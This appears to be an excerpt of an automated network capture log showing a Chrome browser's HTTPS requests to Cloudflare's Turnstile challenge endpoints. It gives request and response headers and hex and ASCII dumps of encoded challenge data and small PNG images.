                                    2024-05-22 15:09:05 UTC1369INData Raw: 67 67 32 4a 42 65 55 68 54 69 46 36 49 62 45 47 4d 69 58 4a 63 6b 59 46 71 62 6f 6c 6b 64 6f 53 52 62 5a 43 51 6c 33 69 53 6b 5a 57 59 70 35 35 7a 65 61 4e 6a 6e 6f 32 62 66 59 56 78 71 6d 79 4b 66 5a 61 6d 68 34 61 4b 72 37 75 2b 76 48 31 32 73 73 47 6a 70 4d 4b 2f 78 70 71 65 71 71 61 43 76 62 36 76 79 63 58 4a 74 4a 32 66 73 73 75 6f 7a 62 62 63 78 35 53 33 6d 37 66 52 32 64 32 62 6f 70 6a 6f 31 4e 66 43 77 65 6e 58 74 75 72 6b 79 36 69 39 79 66 54 47 79 39 50 6f 78 73 2f 58 36 2b 30 41 75 66 7a 4e 7a 75 2f 30 33 62 6e 66 30 2f 67 43 35 74 38 51 41 50 33 4e 2b 68 4c 39 34 66 48 74 34 52 6b 4d 36 52 44 77 38 42 34 42 41 78 50 32 2b 75 4d 6e 39 42 7a 6c 42 51 45 48 4c 69 37 68 45 41 49 46 38 67 45 66 4a 7a 66 78 4c 76 6b 72 45 50 6b 73 45 43 38 56 44 67
                                    Data Ascii: gg2JBeUhTiF6IbEGMiXJckYFqbolkdoSRbZCQl3iSkZWYp55zeaNjno2bfYVxqmyKfZamh4aKr7u+vH12ssGjpMK/xpqeqqaCvb6vycXJtJ2fssuozbbcx5S3m7fR2d2bopjo1NfCwenXturky6i9yfTGy9Poxs/X6+0AufzNzu/03bnf0/gC5t8QAP3N+hL94fHt4RkM6RDw8B4BAxP2+uMn9BzlBQEHLi7hEAIF8gEfJzfxLvkrEPksEC8VDg
                                    2024-05-22 15:09:05 UTC1369INData Raw: 6a 49 64 4e 57 6d 71 45 58 46 35 75 68 32 68 69 63 6f 74 74 69 6d 4f 56 6b 70 39 77 61 33 47 62 57 35 61 46 6b 33 56 39 61 61 4a 6b 67 6e 57 4f 6e 6e 39 2b 67 71 71 67 63 49 4e 33 6b 61 71 78 67 35 53 6e 70 71 39 79 76 6f 36 35 66 4c 53 64 65 5a 71 61 75 73 65 30 7a 4c 6d 62 6f 61 75 79 77 37 57 77 71 35 4b 68 70 4d 79 4e 72 74 48 66 75 74 6d 66 74 36 43 74 72 61 4f 6e 35 72 4f 6a 7a 4c 2b 73 76 71 6a 69 37 37 44 52 35 2b 2f 73 39 37 48 30 78 63 62 6e 37 4e 57 78 31 38 76 77 2b 64 37 58 43 50 66 31 78 66 49 4b 39 65 58 32 35 64 6b 52 42 4f 45 49 36 4f 67 57 2b 50 6f 4c 37 76 4c 62 48 2b 77 55 33 66 7a 34 2f 69 59 6d 32 51 6a 35 2f 4f 72 34 46 78 38 76 36 53 62 78 49 77 6a 78 4a 41 67 6e 44 51 62 36 46 78 59 2b 4d 41 34 2f 44 55 51 76 4a 53 54 2b 4d 53 51
                                    Data Ascii: jIdNWmqEXF5uh2hicottimOVkp9wa3GbW5aFk3V9aaJkgnWOnn9+gqqgcIN3kaqxg5Snpq9yvo65fLSdeZqause0zLmboauyw7Wwq5KhpMyNrtHfutmft6CtraOn5rOjzL+svqji77DR5+/s97H0xcbn7NWx18vw+d7XCPf1xfIK9eX25dkRBOEI6OgW+PoL7vLbH+wU3fz4/iYm2Qj5/Or4Fx8v6SbxIwjxJAgnDQb6FxY+MA4/DUQvJST+MSQ
                                    2024-05-22 15:09:05 UTC1369INData Raw: 57 5a 4a 5a 6d 35 32 66 34 5a 35 61 55 31 6b 62 46 31 76 6a 6e 4f 5a 59 6f 47 4e 6e 6d 2b 68 71 5a 74 71 69 36 61 73 68 35 42 2f 66 6f 6d 6b 64 58 57 59 6f 37 71 61 75 33 79 51 6a 4b 2b 68 6a 37 62 41 75 70 75 46 76 72 2f 4a 74 36 57 36 78 4b 32 65 70 63 76 43 30 61 53 39 30 73 48 50 77 73 61 33 7a 62 79 51 30 64 58 51 33 4c 66 44 33 75 61 78 35 4b 6d 7a 78 72 58 49 32 73 61 6d 34 4d 44 49 33 76 57 6f 38 4f 76 53 39 75 6a 36 36 39 61 37 36 38 7a 74 2b 74 6e 39 39 39 45 49 2b 2f 4c 36 2b 2f 66 39 79 4f 2f 50 43 4d 6f 44 46 39 55 4f 30 41 6b 56 36 50 50 77 33 74 58 57 48 79 4c 73 34 41 37 59 33 52 62 6e 43 53 51 57 2f 50 30 5a 47 66 73 64 37 79 41 32 4d 77 51 45 38 78 6a 33 44 50 6f 5a 4b 79 72 38 48 66 55 62 52 45 59 30 52 68 6f 64 43 67 51 62 49 78 30 6d
                                    Data Ascii: WZJZm52f4Z5aU1kbF1vjnOZYoGNnm+hqZtqi6ash5B/fomkdXWYo7qau3yQjK+hj7bAupuFvr/Jt6W6xK2epcvC0aS90sHPwsa3zbyQ0dXQ3LfD3uax5KmzxrXI2sam4MDI3vWo8OvS9uj669a768zt+tn999EI+/L6+/f9yO/PCMoDF9UO0AkV6PPw3tXWHyLs4A7Y3RbnCSQW/P0ZGfsd7yA2MwQE8xj3DPoZKyr8HfUbREY0RhodCgQbIx0m


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    18192.168.2.449785104.17.2.1844433236C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-05-22 15:09:05 UTC438OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1
                                    Host: challenges.cloudflare.com
                                    Connection: keep-alive
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    Accept: */*
                                    Sec-Fetch-Site: none
                                    Sec-Fetch-Mode: cors
                                    Sec-Fetch-Dest: empty
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2024-05-22 15:09:05 UTC240INHTTP/1.1 200 OK
                                    Date: Wed, 22 May 2024 15:09:05 GMT
                                    Content-Type: image/png
                                    Content-Length: 61
                                    Connection: close
                                    cache-control: max-age=2629800, public
                                    Server: cloudflare
                                    CF-RAY: 887db9ac984b7cb4-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    2024-05-22 15:09:05 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                    Data Ascii: PNGIHDRsIDAT$IENDB`


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    19192.168.2.449786104.17.2.1844433236C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-05-22 15:09:06 UTC487OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1564193166:1716387281:lZ0loq2aY3ZcNtXwgsQeLDV2LUjFlVl_FzsscFgqUA0/887db996294478e1/e2c69a9cf6a5b67 HTTP/1.1
                                    Host: challenges.cloudflare.com
                                    Connection: keep-alive
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    Accept: */*
                                    Sec-Fetch-Site: none
                                    Sec-Fetch-Mode: cors
                                    Sec-Fetch-Dest: empty
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2024-05-22 15:09:06 UTC375INHTTP/1.1 404 Not Found
                                    Date: Wed, 22 May 2024 15:09:06 GMT
                                    Content-Type: application/json
                                    Content-Length: 7
                                    Connection: close
                                    cf-chl-out: FkcWwgb7Dmw4e4VjAaLhkw==$gBZq9TbKZoi7EXeoZfxJLA==
                                    cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                    Server: cloudflare
                                    CF-RAY: 887db9b30ca1c33c-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    2024-05-22 15:09:06 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                    Data Ascii: invalid


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    20192.168.2.449787104.17.2.1844433236C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-05-22 15:09:06 UTC776OUTGET /cdn-cgi/challenge-platform/h/b/i/887db996294478e1/1716390545214/yhIQ4Kim04yJILu HTTP/1.1
                                    Host: challenges.cloudflare.com
                                    Connection: keep-alive
                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                    sec-ch-ua-mobile: ?0
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    sec-ch-ua-platform: "Windows"
                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                    Sec-Fetch-Site: same-origin
                                    Sec-Fetch-Mode: no-cors
                                    Sec-Fetch-Dest: image
                                    Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/9c7p6/0x4AAAAAAADnPIDROrmt1Wwj/light/normal
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2024-05-22 15:09:06 UTC200INHTTP/1.1 200 OK
                                    Date: Wed, 22 May 2024 15:09:06 GMT
                                    Content-Type: image/png
                                    Content-Length: 61
                                    Connection: close
                                    Server: cloudflare
                                    CF-RAY: 887db9b5799e1a3c-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    2024-05-22 15:09:06 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 53 00 00 00 16 08 02 00 00 00 33 45 37 88 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                    Data Ascii: PNGIHDRS3E7IDAT$IENDB`


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    21192.168.2.449788104.17.2.1844433236C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-05-22 15:09:07 UTC428OUTGET /cdn-cgi/challenge-platform/h/b/i/887db996294478e1/1716390545214/yhIQ4Kim04yJILu HTTP/1.1
                                    Host: challenges.cloudflare.com
                                    Connection: keep-alive
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    Accept: */*
                                    Sec-Fetch-Site: none
                                    Sec-Fetch-Mode: cors
                                    Sec-Fetch-Dest: empty
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2024-05-22 15:09:07 UTC200INHTTP/1.1 200 OK
                                    Date: Wed, 22 May 2024 15:09:07 GMT
                                    Content-Type: image/png
                                    Content-Length: 61
                                    Connection: close
                                    Server: cloudflare
                                    CF-RAY: 887db9bb4c7b7cae-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    2024-05-22 15:09:07 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 53 00 00 00 16 08 02 00 00 00 33 45 37 88 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                    Data Ascii: PNGIHDRS3E7IDAT$IENDB`


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    22192.168.2.449789104.17.2.1844433236C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-05-22 15:09:07 UTC805OUTGET /cdn-cgi/challenge-platform/h/b/pat/887db996294478e1/1716390545215/fdcd7d549205ee077dcead15de05e39851605c03eb2db3a456277fbb95e594a1/I2uC-N-gD_nQrj8 HTTP/1.1
                                    Host: challenges.cloudflare.com
                                    Connection: keep-alive
                                    Cache-Control: max-age=0
                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                    sec-ch-ua-mobile: ?0
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    sec-ch-ua-platform: "Windows"
                                    Accept: */*
                                    Sec-Fetch-Site: same-origin
                                    Sec-Fetch-Mode: cors
                                    Sec-Fetch-Dest: empty
                                    Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/9c7p6/0x4AAAAAAADnPIDROrmt1Wwj/light/normal
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2024-05-22 15:09:07 UTC143INHTTP/1.1 401 Unauthorized
                                    Date: Wed, 22 May 2024 15:09:07 GMT
                                    Content-Type: text/plain; charset=UTF-8
                                    Content-Length: 1
                                    Connection: close
                                    2024-05-22 15:09:07 UTC1382INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 5f 63 31 39 56 4a 49 46 37 67 64 39 7a 71 30 56 33 67 58 6a 6d 46 46 67 58 41 50 72 4c 62 4f 6b 56 69 64 5f 75 35 58 6c 6c 4b 45 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                    Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20g_c19VJIF7gd9zq0V3gXjmFFgXAPrLbOkVid_u5XllKEAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                    2024-05-22 15:09:07 UTC1INData Raw: 4a
                                    Data Ascii: J


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    23192.168.2.449790104.17.2.1844433236C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-05-22 15:09:09 UTC918OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1564193166:1716387281:lZ0loq2aY3ZcNtXwgsQeLDV2LUjFlVl_FzsscFgqUA0/887db996294478e1/e2c69a9cf6a5b67 HTTP/1.1
                                    Host: challenges.cloudflare.com
                                    Connection: keep-alive
                                    Content-Length: 31767
                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                    Content-type: application/x-www-form-urlencoded
                                    sec-ch-ua-mobile: ?0
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    CF-Challenge: e2c69a9cf6a5b67
                                    sec-ch-ua-platform: "Windows"
                                    Accept: */*
                                    Origin: https://challenges.cloudflare.com
                                    Sec-Fetch-Site: same-origin
                                    Sec-Fetch-Mode: cors
                                    Sec-Fetch-Dest: empty
                                    Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/9c7p6/0x4AAAAAAADnPIDROrmt1Wwj/light/normal
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2024-05-22 15:09:09 UTC16384OUTData Raw: 76 5f 38 38 37 64 62 39 39 36 32 39 34 34 37 38 65 31 3d 43 69 54 6a 56 2d 55 52 57 2d 57 32 54 2d 61 77 41 32 54 6a 43 38 32 4a 5a 61 76 55 35 77 4e 6a 32 69 5a 41 77 6a 4b 38 2d 39 2d 47 54 77 43 2d 77 35 57 2d 41 77 5a 6a 61 54 5a 6f 77 59 32 2d 77 31 69 55 73 77 61 64 6b 38 77 74 76 38 77 67 25 32 62 75 6c 4c 44 77 59 6a 32 36 76 77 42 39 5a 4b 77 36 44 48 6a 77 64 77 2d 4e 34 64 61 6f 66 72 2d 77 62 32 34 39 61 77 30 6a 32 45 61 77 4a 72 67 4c 38 77 55 44 6a 55 45 4a 77 55 45 55 77 35 51 4d 77 32 39 77 37 61 38 55 37 2b 51 6e 55 50 4a 68 39 6a 55 43 38 44 41 44 4e 6a 77 79 55 52 50 4d 38 57 37 32 48 77 34 61 47 36 4c 47 2b 77 77 6b 78 36 6a 55 5a 7a 4d 4a 30 6a 59 53 77 61 51 75 48 38 4c 66 34 2b 61 37 44 6a 4a 67 66 6d 49 32 35 48 6d 74 71 51 54 37
                                    Data Ascii: v_887db996294478e1=CiTjV-URW-W2T-awA2TjC82JZavU5wNj2iZAwjK8-9-GTwC-w5W-AwZjaTZowY2-w1iUswadk8wtv8wg%2bulLDwYj26vwB9ZKw6DHjwdw-N4daofr-wb249aw0j2EawJrgL8wUDjUEJwUEUw5QMw29w7a8U7+QnUPJh9jUC8DADNjwyURPM8W72Hw4aG6LG+wwkx6jUZzMJ0jYSwaQuH8Lf4+a7DjJgfmI25HmtqQT7
                                    2024-05-22 15:09:09 UTC15383OUTData Raw: 6d 53 6a 4d 77 77 45 36 65 64 34 55 48 77 77 55 2b 55 6a 55 48 5a 38 4c 41 55 31 39 4d 77 5a 6a 55 67 77 73 69 4a 37 6b 70 65 4c 63 4a 53 4c 55 77 37 65 78 65 47 37 38 36 39 59 70 4f 4a 77 32 77 5a 69 77 47 77 4a 54 59 38 77 69 65 62 44 77 54 77 4f 77 41 38 59 4d 55 74 77 74 63 56 4e 77 6f 77 35 38 77 4a 55 45 4a 30 38 2d 38 77 68 77 77 6a 61 4d 55 45 69 37 38 2d 49 77 69 54 54 39 55 61 77 6c 77 37 52 34 49 77 56 35 61 53 4a 69 77 54 39 30 52 55 77 55 6a 2b 41 4f 78 38 68 34 77 7a 38 5a 66 55 66 2b 7a 6a 31 4a 68 57 2b 7a 6a 4a 4e 77 69 77 7a 6a 4a 50 77 4f 39 50 6a 50 43 55 59 77 41 53 59 6d 55 72 65 59 6a 5a 69 55 33 33 5a 79 78 77 55 4b 77 71 57 2d 4d 77 2d 77 2b 2d 34 34 4d 58 48 71 59 56 39 55 79 50 50 4a 34 4d 6e 61 77 34 36 2d 56 4e 41 33 7a 67 4a
                                    Data Ascii: mSjMwwE6ed4UHwwU+UjUHZ8LAU19MwZjUgwsiJ7kpeLcJSLUw7exeG7869YpOJw2wZiwGwJTY8wiebDwTwOwA8YMUtwtcVNwow58wJUEJ08-8whwwjaMUEi78-IwiTT9Uawlw7R4IwV5aSJiwT90RUwUj+AOx8h4wz8ZfUf+zj1JhW+zjJNwiwzjJPwO9PjPCUYwASYmUreYjZiU33ZyxwUKwqW-Mw-w+-44MXHqYV9UyPPJ4Mnaw46-VNA3zgJ
                                    2024-05-22 15:09:09 UTC322INHTTP/1.1 200 OK
                                    Date: Wed, 22 May 2024 15:09:09 GMT
                                    Content-Type: text/plain; charset=UTF-8
                                    Content-Length: 22208
                                    Connection: close
                                    cf-chl-gen: QxS+R2t9k/ISz8bPsI+F1JcdcFVZFftRzNA5ST6/IVToaYpN+W3lk58+KNmf9S3Y$eVIe6KURwhxl5CTPMPbVBQ==
                                    Server: cloudflare
                                    CF-RAY: 887db9c4ea4242b7-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    2024-05-22 15:09:09 UTC1047INData Raw: 54 55 31 50 69 49 46 75 68 49 39 59 63 59 53 5a 5a 6c 65 41 63 35 68 75 66 6f 57 67 6a 33 71 4a 70 4a 4e 31 70 6d 61 57 70 49 43 77 68 49 75 77 70 59 4f 30 6d 4c 65 6a 70 37 6d 38 70 6f 32 51 74 4b 43 4e 6a 35 47 4f 66 70 43 57 6f 36 75 4d 72 5a 36 6a 7a 73 4f 49 79 4a 4b 48 77 70 61 70 74 4d 75 6b 7a 4d 2b 6f 6b 64 66 65 6f 4b 36 38 34 36 58 54 6e 75 6a 53 6e 65 72 66 77 4c 7a 49 32 2f 48 77 36 38 48 6c 79 2b 62 4d 37 63 50 70 74 4e 58 4e 79 4f 32 38 7a 4d 4b 38 7a 38 58 67 76 2b 6b 41 32 50 33 66 43 77 73 41 7a 74 33 66 42 64 44 4a 35 51 50 55 35 51 6f 4e 46 42 54 74 43 39 30 46 49 78 50 66 48 39 34 59 41 50 4d 59 35 41 58 72 4b 42 77 42 4c 41 41 6c 4c 50 41 45 4a 7a 41 53 4a 51 37 35 4f 42 49 54 2f 42 42 46 46 68 45 7a 42 52 30 67 52 45 55 45 50 45 42
                                    Data Ascii: TU1PiIFuhI9YcYSZZleAc5hufoWgj3qJpJN1pmaWpICwhIuwpYO0mLejp7m8po2QtKCNj5GOfpCWo6uMrZ6jzsOIyJKHwpaptMukzM+okdfeoK6846XTnujSnerfwLzI2/Hw68Hly+bM7cPptNXNyO28zMK8z8Xgv+kA2P3fCwsAzt3fBdDJ5QPU5QoNFBTtC90FIxPfH94YAPMY5AXrKBwBLAAlLPAEJzASJQ75OBIT/BBFFhEzBR0gREUEPEB
                                    2024-05-22 15:09:09 UTC1369INData Raw: 53 59 6e 32 4a 6f 59 46 71 6e 61 43 64 73 49 69 65 6f 37 4e 6d 6a 58 42 30 64 35 47 4a 65 6f 53 37 68 70 52 79 76 6f 36 39 75 35 4b 65 6b 38 54 45 68 63 4b 65 6a 4b 4b 6e 77 36 61 49 70 71 6e 42 76 37 4f 51 79 4b 76 56 31 63 72 50 78 37 43 2f 72 39 65 7a 6e 72 50 52 79 4b 4b 7a 32 63 32 6c 71 75 4c 52 38 4c 4c 4e 30 61 32 79 34 39 61 78 74 75 37 48 79 39 6a 72 2f 72 33 77 41 4e 76 66 42 76 4c 6e 79 64 76 58 76 74 76 4b 7a 2b 54 61 33 67 51 4c 44 2f 41 4f 7a 67 30 51 35 42 76 55 32 76 66 37 48 78 7a 74 34 53 55 6d 2f 68 33 7a 4a 41 77 72 41 69 77 4a 47 2b 30 6a 41 68 30 4d 41 53 63 6d 46 53 55 36 47 76 6b 48 51 44 33 2b 51 7a 35 46 47 52 34 39 4e 68 31 43 52 55 55 36 55 45 63 44 49 7a 51 47 55 55 56 51 56 79 35 4d 4c 44 41 6f 54 7a 41 2b 4d 46 30 31 48 46
                                    Data Ascii: SYn2JoYFqnaCdsIieo7NmjXB0d5GJeoS7hpRyvo69u5Kek8TEhcKejKKnw6aIpqnBv7OQyKvV1crPx7C/r9eznrPRyKKz2c2lquLR8LLN0a2y49axtu7Hy9jr/r3wANvfBvLnydvXvtvKz+Ta3gQLD/AOzg0Q5BvU2vf7Hxzt4SUm/h3zJAwrAiwJG+0jAh0MAScmFSU6GvkHQD3+Qz5FGR49Nh1CRUU6UEcDIzQGUUVQVy5MLDAoTzA+MF01HF
                                    2024-05-22 15:09:09 UTC1369INData Raw: 6c 61 36 65 67 58 2b 64 73 4a 79 45 62 61 53 42 74 72 57 75 75 71 2b 74 74 62 32 58 6a 63 43 50 77 49 36 79 75 37 36 61 67 36 69 47 69 59 65 37 78 34 32 6b 72 63 47 53 76 36 6e 4d 6d 64 43 38 71 36 62 62 7a 37 69 70 77 74 2f 4f 33 4e 76 54 78 4e 72 72 6e 64 37 69 31 71 47 38 37 73 36 6c 77 50 4c 6e 38 63 7a 59 38 2f 76 47 2b 62 37 49 32 38 72 64 37 39 76 42 43 50 4d 4b 35 4f 51 49 43 67 4c 6d 35 64 2f 52 38 73 55 43 39 65 4c 72 42 78 73 4c 37 65 67 62 31 66 33 66 32 52 44 5a 46 53 41 6a 42 2b 48 62 2b 2f 50 31 48 75 6f 77 4a 42 33 75 44 67 73 41 4e 7a 66 71 4c 77 73 4f 2b 76 51 4d 46 41 34 58 2f 66 6b 50 48 44 41 6c 48 43 45 4a 53 45 41 6b 44 51 5a 49 49 68 41 75 48 69 6f 56 4d 7a 49 6d 46 7a 68 63 4b 68 73 39 56 46 73 68 4a 43 31 47 5a 7a 4d 2f 4f 6d 46
                                    Data Ascii: la6egX+dsJyEbaSBtrWuuq+ttb2XjcCPwI6yu76ag6iGiYe7x42krcGSv6nMmdC8q6bbz7ipwt/O3NvTxNrrnd7i1qG87s6lwPLn8czY8/vG+b7I28rd79vBCPMK5OQICgLm5d/R8sUC9eLrBxsL7egb1f3f2RDZFSAjB+Hb+/P1HuowJB3uDgsANzfqLwsO+vQMFA4X/fkPHDAlHCEJSEAkDQZIIhAuHioVMzImFzhcKhs9VFshJC1GZzM/OmF
                                    2024-05-22 15:09:09 UTC1369INData Raw: 6d 79 53 74 58 47 7a 6b 4a 4e 34 6a 59 6d 34 6e 5a 32 41 76 62 75 4d 64 71 43 57 76 5a 32 30 68 4a 79 6b 69 36 54 4c 6a 62 36 68 6f 34 62 45 71 63 75 70 73 73 7a 62 31 4b 36 6e 79 4e 75 79 72 39 6e 51 34 65 53 7a 75 4d 47 32 71 74 54 42 36 4e 33 70 38 73 36 79 79 38 44 53 74 4e 44 45 75 62 54 51 2f 76 48 48 31 41 4c 33 76 64 62 67 34 73 44 67 31 4e 37 45 34 77 34 4b 31 2b 51 54 37 73 7a 78 7a 52 58 34 2b 66 45 63 37 39 76 7a 31 2f 77 53 2f 76 59 45 31 68 58 35 43 50 6b 42 41 77 6a 32 35 2f 73 41 47 79 6b 6d 42 52 55 46 4e 54 59 72 36 7a 45 72 2b 68 66 31 49 52 77 4b 4c 51 48 36 45 6a 68 42 49 6a 38 2f 46 53 4d 63 52 30 42 42 48 69 38 51 52 6b 6c 57 52 7a 70 53 4b 7a 67 62 4c 6b 41 63 58 53 78 66 51 31 4a 45 51 53 4a 64 56 56 39 59 62 55 5a 70 52 43 68 75
                                    Data Ascii: myStXGzkJN4jYm4nZ2AvbuMdqCWvZ20hJyki6TLjb6ho4bEqcupsszb1K6nyNuyr9nQ4eSzuMG2qtTB6N3p8s6yy8DStNDEubTQ/vHH1AL3vdbg4sDg1N7E4w4K1+QT7szxzRX4+fEc79vz1/wS/vYE1hX5CPkBAwj25/sAGykmBRUFNTYr6zEr+hf1IRwKLQH6EjhBIj8/FSMcR0BBHi8QRklWRzpSKzgbLkAcXSxfQ1JEQSJdVV9YbUZpRChu
                                    2024-05-22 15:09:09 UTC1369INData Raw: 43 59 72 35 69 61 70 70 70 2b 6b 34 42 2b 78 48 32 31 71 4b 6d 42 79 49 53 5a 6f 4c 61 58 76 4e 4b 6d 70 63 6d 6e 6e 37 48 58 73 4c 57 72 71 70 65 37 33 63 69 61 6d 39 69 67 76 63 37 41 33 4e 79 6a 35 62 2f 69 33 63 4b 73 73 63 48 53 37 2b 48 55 31 63 33 75 74 72 6e 51 75 74 57 31 31 50 33 43 7a 50 4c 6c 32 73 54 63 34 4f 71 39 32 41 73 42 77 64 77 50 45 63 58 67 45 2f 62 4a 35 42 66 32 7a 65 67 62 45 42 72 30 41 52 77 6b 37 69 4c 6d 38 41 54 79 42 68 67 45 4c 6a 44 68 37 68 4d 4f 4d 4f 6f 75 45 51 34 75 4f 42 59 53 39 77 6f 59 46 68 30 38 48 42 6f 69 48 44 59 65 51 43 5a 43 46 30 56 49 42 30 51 75 55 7a 45 39 4a 30 6c 47 52 6b 74 49 4e 46 73 33 4c 31 77 59 49 44 68 67 58 7a 59 66 52 54 5a 65 53 30 78 61 4a 57 42 6e 62 32 70 63 5a 30 52 31 5a 56 4e 6d 4d
                                    Data Ascii: CYr5iappp+k4B+xH21qKmByISZoLaXvNKmpcmnn7HXsLWrqpe73ciam9igvc7A3Nyj5b/i3cKsscHS7+HU1c3utrnQutW11P3CzPLl2sTc4Oq92AsBwdwPEcXgE/bJ5Bf2zegbEBr0ARwk7iLm8ATyBhgELjDh7hMOMOouEQ4uOBYS9woYFh08HBoiHDYeQCZCF0VIB0QuUzE9J0lGRktINFs3L1wYIDhgXzYfRTZeS0xaJWBnb2pcZ0R1ZVNmM
